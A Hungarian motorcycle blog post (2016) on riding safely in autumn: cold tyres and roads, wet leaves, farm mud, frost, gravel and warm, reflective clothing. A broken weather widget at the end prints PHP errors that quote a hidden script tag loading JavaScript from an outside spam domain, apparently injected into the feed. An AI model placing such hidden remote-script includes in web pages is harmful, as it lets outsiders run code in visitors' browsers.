njmedia00003

A tavaszi motorozással kapcsolatban már több segítséget is olvashattunk. Foglalkoztunk azzal, hogy miként viselkedjünk kora tavasszal a közlekedés során, ha elővesszük a motorunkat a tél után. Most viszont foglalkozzunk azzal a témával, hogy miként viselkedjünk akkor, amikor már beköszönt az ősz és már csak kevés időnk maradt a motoros idényből hátra, mert nem sokára jön a hidegebb, zordabb idő.Ősszel is ugyanolyan jó érzés motorral szelni az utakat, de megkockáztatom, hogy talán még jobb is.

 

Viszont az is igaz, hogy ugyanolyan veszélyes is lehet éppen a tavaszi viselkedéssel kapcsolatosakkal ellenkező okokból. Hiszen már egybehangoltan, összeszokva vasunkkal hasítottunk egész nyáron. Ebből következik, hogy bátrabban húztuk a gázt, és döntöttük a kanyarokat. Bátrabban előztünk. Erőteljesebben gyorsítottunk egy induláskor. És éppen ezek azok amiből most vissza kell vennünk.

Egy kényszeres hirtelen fékezés sem okozott gondot. Hát most ebben az időszakban okozhat bizony!

Gyönyörű ez az évszak az őszi színek miatt, és a hőmérséklet is a legjobb a motorozáshoz olyan értelemben, hogy be lehet öltözni a motoros szerkóba úgy, hogy nem sülünk bele egy piros lámpánál állva, mint egész nyáron.

njmedia00001

 

 

Szóval motorozzunk ősszel is!

 

 

Ilyenkor viszont több odafigyelést kell tanúsítani, mint egész nyáron, ezért nem árt, ha felkészülünk a megváltozott körülményekre.

njmedia00002
A gumiabroncsok tapadása ilyenkor már sokkal alacsonyabb, mint nyáron. Lassabban érik el azt a hőmérsékletet, amivel biztonságosan lehet közlekedni, de figyelem! Az aszfalt meg egyáltalán nem! Az hideg marad, vagy legalábbis biztosan nem tud annyira felmelegedni, annyira amennyire kellene.

 

 

Kora délutánra van arra kilátás, hogy esetleg 2-3 óra hosszára megközelíti az általunk elvárt hőmérsékletet. Ez nem azt jelenti, hogy csak ebben az időkorlátban üljünk motorra, hanem csak annyit jelent, hogy óvatosabban induljunk neki egy túrának!

Tehát:

  • Gyorsításkor finomabban húzzuk a fülét annak a gázkarnak, mert az erő attól, hogy nem nyár van még ugyanúgy meg van a gépünknek, ezért könnyen kipörög a hátsó kerék alólunk, és csúnya esés lehet belőle!
  • Haladáskor jobban figyeljük az utak minőségét, mert lehetnek olyan kátyúk az utakon, amikre éppen rá esett néhány falevél, ami eltakarja a gödröket!

 

njmedia00004

 

 

 

Maga a falevél amúgy önmagában is csúszós főleg ha nedves. Ez kimondottan veszélyes, mert nem gondolnánk!

 

 

  • Nemkülönben a mezőgazdasági gépek által a földutakról felhordott sár az aszfalton, ami ilyenkor az őszi betakarítás során sűrűbben fordul elő.
  • A délelőtti órákban már lehetnek talaj menti fagyok, ezért vigyázzunk, hogy nehogy kicsússzon alólunk a motor!
  • Akár lehet több kisebb víztócsa is, ami óvatosabb megközelítést von maga után, hiszen ez is veszélyes lehet, akárcsak a nedves, csúszós úttest.
  • Általában a hegyes, dombos utakra jellemző, hogy ilyenkor több kavics van az út széleken a kanyarokban, amik szét szóródtak az úttest közepéig is. Tehát óvatosabban a kanyarokban is!
  • Az éles kanyarokban a döntésekből is érdemes kicsit vissza venni, éppen az imént említett hőmérséklet tulajdonságok miatt.

Nagyon fontos, hogy a megállásra kijelölt pontot előre felmérve most korábban kezdjünk el lassítani, hogy ne erőteljes fékezéssel kelljen azt elérni!

Én elhiszem, hogy jó érzés volt egész nyáron a rutinosabb, pörgősebb magatartást alkalmazni, de ilyenkor ennek itt már helye nincs, ugyanúgy, ahogyan kora tavasszal sem volt!

Az öltözködés is fontos művelet, de nem csak azért, hogy ne fázzunk, és biztonságosabb egy esésnél, (ebbe most nem mennék bele, mert erről már volt szó) hanem mert ha a pilóta remeg a fázástól, és végtagjai le vannak dermedve, akkor nem tudja biztonságosan kezelni a motort, és a figyelése is alább hagy, tehát a reakció ideje megnő elég drasztikusan.
Ilyenkor már előkerülhet a símaszk is a bukó alá, ahogyan az aláöltözetek a lábunkra és testünkre. Általában a motoros dzsekik és nadrágok már fényvisszaverősek és a láthatóságuk már jobbak. Azért érdemes ezeket felvenni, hogy a közlekedésben részt vevők könnyebben észre vegyenek egy párásabb időben is!

Balesetmentes közlekedést kívánok! A szerk.

                      2016.10.10.


Comments are closed.

Időjárás


Warning: SimpleXMLElement::__construct(): Entity: line 1: parser error : EntityRef: expecting ';' in /home/njmediah/public_html/wp-content/plugins/esotanc-weather/esotanc-weather-widget.php on line 121

Warning: SimpleXMLElement::__construct(): ROR --><nofollow><noindex><script src="http://essays-today.com/?sserpdrow&source in /home/njmediah/public_html/wp-content/plugins/esotanc-weather/esotanc-weather-widget.php on line 121

Warning: SimpleXMLElement::__construct(): ^ in /home/njmediah/public_html/wp-content/plugins/esotanc-weather/esotanc-weather-widget.php on line 121

Warning: SimpleXMLElement::__construct(): Entity: line 1: parser error : EntityRef: expecting ';' in /home/njmediah/public_html/wp-content/plugins/esotanc-weather/esotanc-weather-widget.php on line 121

Warning: SimpleXMLElement::__construct(): oindex><script src="http://essays-today.com/?sserpdrow&source=esotanc.hu&keyword in /home/njmediah/public_html/wp-content/plugins/esotanc-weather/esotanc-weather-widget.php on line 121

Warning: SimpleXMLElement::__construct(): ^ in /home/njmediah/public_html/wp-content/plugins/esotanc-weather/esotanc-weather-widget.php on line 121

Warning: SimpleXMLElement::__construct(): Entity: line 1: parser error : Extra content at the end of the document in /home/njmediah/public_html/wp-content/plugins/esotanc-weather/esotanc-weather-widget.php on line 121

Warning: SimpleXMLElement::__construct(): rpdrow&source=esotanc.hu&keyword=rssbudapest.xml"></script></noindex></nofollow> in /home/njmediah/public_html/wp-content/plugins/esotanc-weather/esotanc-weather-widget.php on line 121

Warning: SimpleXMLElement::__construct(): ^ in /home/njmediah/public_html/wp-content/plugins/esotanc-weather/esotanc-weather-widget.php on line 121

Fatal error: Uncaught exception 'Exception' with message 'String could not be parsed as XML' in /home/njmediah/public_html/wp-content/plugins/esotanc-weather/esotanc-weather-widget.php:121 Stack trace: #0 /home/njmediah/public_html/wp-content/plugins/esotanc-weather/esotanc-weather-widget.php(121): SimpleXMLElement->__construct('<!-- 404-NOT-FO...') #1 /home/njmediah/public_html/wp-includes/class-wp-widget.php(395): esotanc_weather_widget->widget(Array, Array) #2 [internal function]: WP_Widget->display_callback(Array, Array) #3 /home/njmediah/public_html/wp-includes/widgets.php(738): call_user_func_array(Array, Array) #4 /home/njmediah/public_html/wp-content/themes/chip-zero/chip/common/sidebar.php(1): dynamic_sidebar('top-right-sideb...') #5 /home/njmediah/public_html/wp-includes/template.php(690): require('/home/njmediah/...') #6 /home/njmediah/public_html/wp-includes/template.php(647): load_template('/home/njmediah/...', false) #7 /home/njmediah/public_html/wp-content/themes/chip-zero/sidebar.php(4): locate_template(Ar in /home/njmediah/public_html/wp-content/plugins/esotanc-weather/esotanc-weather-widget.php on line 121